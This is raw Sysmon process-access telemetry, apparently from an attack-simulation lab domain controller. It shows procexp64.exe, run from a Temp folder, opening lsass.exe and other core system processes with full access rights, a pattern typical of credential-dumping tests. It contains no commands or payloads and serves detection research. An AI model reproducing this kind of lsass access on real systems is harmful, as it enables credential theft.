15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.298{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b0e30|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+97140|C:\Windows\System32\SHELL32.dll+b0dec|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790004Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790003Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:38.027{732C744F-2806-600F-D682-00000000A301}66248088C:\Windows\explorer.exe{732C744F-3255-6010-D5A2-00000000A301}2272C:\Windows\System32\win32calc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790156Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.829{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+15eb9|C:\Windows\System32\SHELL32.dll+b07e0|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790155Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:39.814{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 